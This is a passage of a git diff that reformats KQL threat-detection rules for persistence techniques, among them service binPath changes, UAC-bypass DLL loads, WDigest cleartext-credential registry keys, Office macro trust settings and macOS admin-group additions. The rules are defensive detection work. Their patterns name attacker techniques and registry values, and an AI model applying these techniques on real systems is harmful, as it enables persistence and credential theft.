".scr" and ProcessCommandLine contains "/f")) \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_service_path_modification.kql b/KQL/rules/Persistence/suspicious_service_path_modification.kql index ae3e9bc4..845ab73d 100644 --- a/KQL/rules/Persistence/suspicious_service_path_modification.kql +++ b/KQL/rules/Persistence/suspicious_service_path_modification.kql @@ -1,12 +1,12 @@ -// Title: Suspicious Service Path Modification -// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019-10-21 -// Level: high -// Description: Detects service path modification via the "sc" binary to a suspicious command or path -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Suspicious Service Path Modification +// Author: Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems) +// Date: 2019-10-21 +// Level: high +// Description: Detects service path modification via the "sc" binary to a suspicious command or path +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1543.003 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "powershell" or ProcessCommandLine contains "cmd " or ProcessCommandLine contains "mshta" or ProcessCommandLine contains "wscript" or ProcessCommandLine contains "cscript" or ProcessCommandLine contains "rundll32" or ProcessCommandLine contains "svchost" or ProcessCommandLine contains "dllhost" or ProcessCommandLine contains "cmd.exe /c" or ProcessCommandLine contains "cmd.exe /k" or ProcessCommandLine contains "cmd.exe /r" or ProcessCommandLine contains "cmd /c" or ProcessCommandLine contains "cmd /k" or ProcessCommandLine contains "cmd /r" or ProcessCommandLine contains "C:\\Users\\Public" or ProcessCommandLine contains "\\Downloads\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" or ProcessCommandLine contains "C:\\Windows\\TEMP\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp") and (ProcessCommandLine contains "config" and ProcessCommandLine contains "binPath") and FolderPath endswith "\\sc.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql index 34a9f69f..c8a806ef 100644 --- a/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql +++ b/KQL/rules/Persistence/suspicious_vboxdrvinst_exe_parameters.kql @@ -1,14 +1,14 @@ -// Title: Suspicious VBoxDrvInst.exe Parameters -// Author: Konstantin Grishchenko, oscd.community -// Date: 2020-10-06 -// Level: medium -// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. -// This allows to create values in the registry and install drivers. -// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process - -DeviceProcessEvents +// Title: Suspicious VBoxDrvInst.exe Parameters +// Author: Konstantin Grishchenko, oscd.community +// Date: 2020-10-06 +// Level: medium +// Description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. +// This allows to create values in the registry and install drivers. +// For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process + +DeviceProcessEvents | where (ProcessCommandLine contains "driver" and ProcessCommandLine contains "executeinf") and FolderPath endswith "\\VBoxDrvInst.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql index 5f67a5a7..03fc04ae 100644 --- a/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql +++ b/KQL/rules/Persistence/terminal_server_client_connection_history_cleared_registry.kql @@ -1,10 +1,10 @@ -// Title: Terminal Server Client Connection History Cleared - Registry -// Author: Christian Burkard (Nextron Systems) -// Date: 2021-10-19 -// Level: high -// Description: Detects the deletion of registry keys containing the MSTSC connection history -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112 - -DeviceRegistryEvents +// Title: Terminal Server Client Connection History Cleared - Registry +// Author: Christian Burkard (Nextron Systems) +// Date: 2021-10-19 +// Level: high +// Description: Detects the deletion of registry keys containing the MSTSC connection history +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1070, attack.t1112 + +DeviceRegistryEvents | where (ActionType =~ "DeleteValue" and RegistryKey contains "\\Microsoft\\Terminal Server Client\\Default\\MRU") or ((ActionType in~ ("RegistryKeyDeleted", "RegistryValueDeleted")) and RegistryKey endswith "\\Microsoft\\Terminal Server Client\\Servers*") \ No newline at end of file diff --git a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql index b5c08c75..07f21acf 100644 --- a/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql +++ b/KQL/rules/Persistence/trust_access_disable_for_vbapplications.kql @@ -1,12 +1,12 @@ -// Title: Trust Access Disable For VBApplications -// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-05-22 -// Level: high -// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Trust Access Disable For VBApplications +// Author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-05-22 +// Level: high +// Description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\Security\\AccessVBOM" \ No newline at end of file diff --git a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql index 5a550630..34402445 100644 --- a/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql +++ b/KQL/rules/Persistence/trusted_path_bypass_via_windows_directory_spoofing.kql @@ -1,13 +1,13 @@ -// Title: Trusted Path Bypass via Windows Directory Spoofing -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-17 -// Level: high -// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. -// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002 -// False Positives: -// - Unlikely - -DeviceImageLoadEvents +// Title: Trusted Path Bypass via Windows Directory Spoofing +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-17 +// Level: high +// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification. +// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002 +// False Positives: +// - Unlikely + +DeviceImageLoadEvents | where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\" \ No newline at end of file diff --git a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql index 47262b30..22219519 100644 --- a/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql +++ b/KQL/rules/Persistence/uac_bypass_with_fake_dll.kql @@ -1,12 +1,12 @@ -// Title: UAC Bypass With Fake DLL -// Author: oscd.community, Dmitry Uchakin -// Date: 2020-10-06 -// Level: high -// Description: Attempts to load dismcore.dll after dropping it -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001 -// False Positives: -// - Actions of a legitimate telnet client - -DeviceImageLoadEvents +// Title: UAC Bypass With Fake DLL +// Author: oscd.community, Dmitry Uchakin +// Date: 2020-10-06 +// Level: high +// Description: Attempts to load dismcore.dll after dropping it +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001 +// False Positives: +// - Actions of a legitimate telnet client + +DeviceImageLoadEvents | where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll")) \ No newline at end of file diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql index bac7ab41..6ebcc586 100644 --- a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql +++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_filecreation.kql @@ -1,12 +1,12 @@ -// Title: UEFI Persistence Via Wpbbin - FileCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-18 -// Level: high -// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 -// False Positives: -// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) - -DeviceFileEvents +// Title: UEFI Persistence Via Wpbbin - FileCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-18 +// Level: high +// Description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 +// False Positives: +// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) + +DeviceFileEvents | where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql index 231706a3..7b3939f6 100644 --- a/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql +++ b/KQL/rules/Persistence/uefi_persistence_via_wpbbin_processcreation.kql @@ -1,12 +1,12 @@ -// Title: UEFI Persistence Via Wpbbin - ProcessCreation -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-07-18 -// Level: high -// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 -// False Positives: -// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) - -DeviceProcessEvents +// Title: UEFI Persistence Via Wpbbin - ProcessCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-18 +// Level: high +// Description: Detects execution of the binary "wpbbin" which is used as part of the UEFI based persistence method described in the reference section +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1542.001 +// False Positives: +// - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) + +DeviceProcessEvents | where FolderPath =~ "C:\\Windows\\System32\\wpbbin.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql index ade7cbe0..539307b3 100644 --- a/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql +++ b/KQL/rules/Persistence/uncommon_extension_shim_database_installation_via_sdbinst_exe.kql @@ -1,11 +1,11 @@ -// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-08-01 -// Level: medium -// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. -// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 - -DeviceProcessEvents +// Title: Uncommon Extension Shim Database Installation Via Sdbinst.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-08-01 +// Level: medium +// Description: Detects installation of a potentially suspicious new shim with an uncommon extension using sdbinst.exe. +// Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.011 + +DeviceProcessEvents | where (FolderPath endswith "\\sdbinst.exe" or ProcessVersionInfoOriginalFileName =~ "sdbinst.exe") and (not((ProcessCommandLine =~ "" or ProcessCommandLine contains ".sdb" or ((ProcessCommandLine endswith " -c" or ProcessCommandLine endswith " -f" or ProcessCommandLine endswith " -mm" or ProcessCommandLine endswith " -t") or ProcessCommandLine contains " -m -bg") or isnull(ProcessCommandLine)))) \ No newline at end of file diff --git a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql index b59815c2..5e7459d2 100644 --- a/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql +++ b/KQL/rules/Persistence/uncommon_microsoft_office_trusted_location_added.kql @@ -1,12 +1,12 @@ -// Title: Uncommon Microsoft Office Trusted Location Added -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-21 -// Level: high -// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 -// False Positives: -// - Other unknown legitimate or custom paths need to be filtered to avoid false positives - -DeviceRegistryEvents +// Title: Uncommon Microsoft Office Trusted Location Added +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-21 +// Level: high +// Description: Detects changes to registry keys related to "Trusted Location" of Microsoft Office where the path is set to something uncommon. Attackers might add additional trusted locations to avoid macro security restrictions. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Other unknown legitimate or custom paths need to be filtered to avoid false positives + +DeviceRegistryEvents | where (RegistryKey contains "Security\\Trusted Locations\\Location" and RegistryKey endswith "\\Path") and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" or InitiatingProcessFolderPath contains ":\\Program Files (x86)\\Microsoft Office\\") or (InitiatingProcessFolderPath contains ":\\Program Files\\Common Files\\Microsoft Shared\\ClickToRun\\" and InitiatingProcessFolderPath endswith "\\OfficeClickToRun.exe")))) and (not((RegistryValueData contains "%APPDATA%\\Microsoft\\Templates" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Templates" or RegistryValueData contains "%APPDATA%\\Microsoft\\Word\\Startup" or RegistryValueData contains "%%APPDATA%%\\Microsoft\\Word\\Startup" or RegistryValueData contains ":\\Program Files (x86)\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office (x86)\\Templates" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\root\\Templates\\" or RegistryValueData contains ":\\Program Files\\Microsoft Office\\Templates\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql index 3365d1b6..bdbe7cfb 100644 --- a/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql +++ b/KQL/rules/Persistence/unsigned_appx_installation_attempt_using_add_appxpackage.kql @@ -1,12 +1,12 @@ -// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-01-31 -// Level: medium -// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion -// False Positives: -// - Installation of unsigned packages for testing purposes - -DeviceProcessEvents +// Title: Unsigned AppX Installation Attempt Using Add-AppxPackage +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-31 +// Level: medium +// Description: Detects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion +// False Positives: +// - Installation of unsigned packages for testing purposes + +DeviceProcessEvents | where (ProcessCommandLine contains "Add-AppPackage " or ProcessCommandLine contains "Add-AppxPackage ") and ProcessCommandLine contains " -AllowUnsigned" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql index f7232a32..b439e876 100644 --- a/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql +++ b/KQL/rules/Persistence/unusual_child_process_of_dns_exe.kql @@ -1,10 +1,10 @@ -// Title: Unusual Child Process of dns.exe -// Author: Tim Rauch, Elastic (idea) -// Date: 2022-09-27 -// Level: high -// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 - -DeviceProcessEvents +// Title: Unusual Child Process of dns.exe +// Author: Tim Rauch, Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceProcessEvents | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\conhost.exe")) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql index 99b3535d..b3f52523 100644 --- a/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql +++ b/KQL/rules/Persistence/unusual_file_deletion_by_dns_exe.kql @@ -1,10 +1,10 @@ -// Title: Unusual File Deletion by Dns.exe -// Author: Tim Rauch (Nextron Systems), Elastic (idea) -// Date: 2022-09-27 -// Level: high -// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 - -DeviceFileEvents +// Title: Unusual File Deletion by Dns.exe +// Author: Tim Rauch (Nextron Systems), Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql index 14db39a0..8b8676a8 100644 --- a/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql +++ b/KQL/rules/Persistence/unusual_file_modification_by_dns_exe.kql @@ -1,10 +1,10 @@ -// Title: Unusual File Modification by dns.exe -// Author: Tim Rauch (Nextron Systems), Elastic (idea) -// Date: 2022-09-27 -// Level: high -// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.initial-access, attack.t1133 - -DeviceFileEvents +// Title: Unusual File Modification by dns.exe +// Author: Tim Rauch (Nextron Systems), Elastic (idea) +// Date: 2022-09-27 +// Level: high +// Description: Detects an unexpected file being modified by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 + +DeviceFileEvents | where InitiatingProcessFolderPath endswith "\\dns.exe" and (not(FolderPath endswith "\\dns.log")) \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql index 51f4164f..ddb60274 100644 --- a/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dscl.kql @@ -1,12 +1,12 @@ -// Title: User Added To Admin Group Via Dscl -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-03-19 -// Level: medium -// Description: Detects attempts to create and add an account to the admin group via "dscl" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: User Added To Admin Group Via Dscl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "dscl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " -append " and ProcessCommandLine contains " /Groups/admin " and ProcessCommandLine contains " GroupMembership ") and FolderPath endswith "/dscl" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql index 74d485a9..1017b5ae 100644 --- a/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_dseditgroup.kql @@ -1,12 +1,12 @@ -// Title: User Added To Admin Group Via DseditGroup -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-08-22 -// Level: medium -// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: User Added To Admin Group Via DseditGroup +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-08-22 +// Level: medium +// Description: Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " -o edit " and ProcessCommandLine contains " -a " and ProcessCommandLine contains " -t user" and ProcessCommandLine contains "admin") and FolderPath endswith "/dseditgroup" \ No newline at end of file diff --git a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql index a3602473..3de1e977 100644 --- a/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql +++ b/KQL/rules/Persistence/user_added_to_admin_group_via_sysadminctl.kql @@ -1,12 +1,12 @@ -// Title: User Added To Admin Group Via Sysadminctl -// Author: Sohan G (D4rkCiph3r) -// Date: 2023-03-19 -// Level: medium -// Description: Detects attempts to create and add an account to the admin group via "sysadminctl" -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 -// False Positives: -// - Legitimate administration activities - -DeviceProcessEvents +// Title: User Added To Admin Group Via Sysadminctl +// Author: Sohan G (D4rkCiph3r) +// Date: 2023-03-19 +// Level: medium +// Description: Detects attempts to create and add an account to the admin group via "sysadminctl" +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.initial-access, attack.privilege-escalation, attack.t1078.003 +// False Positives: +// - Legitimate administration activities + +DeviceProcessEvents | where (ProcessCommandLine contains " -addUser " and ProcessCommandLine contains " -admin ") and FolderPath endswith "/sysadminctl" \ No newline at end of file diff --git a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql index c6371aa8..9f0a8e94 100644 --- a/KQL/rules/Persistence/vscode_powershell_profile_modification.kql +++ b/KQL/rules/Persistence/vscode_powershell_profile_modification.kql @@ -1,12 +1,12 @@ -// Title: VsCode Powershell Profile Modification -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-24 -// Level: medium -// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 -// False Positives: -// - Legitimate use of the profile by developers or administrators - -DeviceFileEvents +// Title: VsCode Powershell Profile Modification +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-24 +// Level: medium +// Description: Detects the creation or modification of a vscode related powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1546.013 +// False Positives: +// - Legitimate use of the profile by developers or administrators + +DeviceFileEvents | where FolderPath endswith "\\Microsoft.VSCode_profile.ps1" \ No newline at end of file diff --git a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql index be1916c4..1ad5897e 100644 --- a/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql +++ b/KQL/rules/Persistence/wdigest_credguard_registry_modification.kql @@ -1,12 +1,12 @@ -// Title: Wdigest CredGuard Registry Modification -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019-08-25 -// Level: high -// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from -// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. -// This is usually used with UseLogonCredential to manipulate the caching credentials. -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Wdigest CredGuard Registry Modification +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-08-25 +// Level: high +// Description: Detects potential malicious modification of the property value of IsCredGuardEnabled from +// HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Cred Guard on a system. +// This is usually used with UseLogonCredential to manipulate the caching credentials. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryKey endswith "\\IsCredGuardEnabled" \ No newline at end of file diff --git a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql index 9b1e6ee7..50528dd1 100644 --- a/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql +++ b/KQL/rules/Persistence/wdigest_enable_uselogoncredential.kql @@ -1,10 +1,10 @@ -// Title: Wdigest Enable UseLogonCredential -// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) -// Date: 2019-09-12 -// Level: high -// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.defense-evasion, attack.t1112 - -DeviceRegistryEvents +// Title: Wdigest Enable UseLogonCredential +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2019-09-12 +// Level: high +// Description: Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to enable clear-text credentials +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents | where RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "WDigest\\UseLogonCredential" \ No newline at end of file diff --git a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql index ff9af79d..000b1ee1 100644 --- a/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql +++ b/KQL/rules/Persistence/webshell_detection_with_command_line_keywords.kql @@ -1,10 +1,10 @@ -// Title: Webshell Detection With Command Line Keywords -// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson -// Date: 2017-01-01 -// Level: high -// Description: Detects certain command line parameters often used during reconnaissance activity via web shells -// MITRE Tactic: Persistence -// Tags: attack.persistence, attack.discovery, attack.t1505.003, attack.t1018, attack.t1033, attack.t1087 - -DeviceProcessEvents +// Title: Webshell Detection With Command Line Keywords +// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community, Chad Hudson, Matt Anderson +// Date: 2017-01-01 +// Level: high +// Description: Detects certain command line 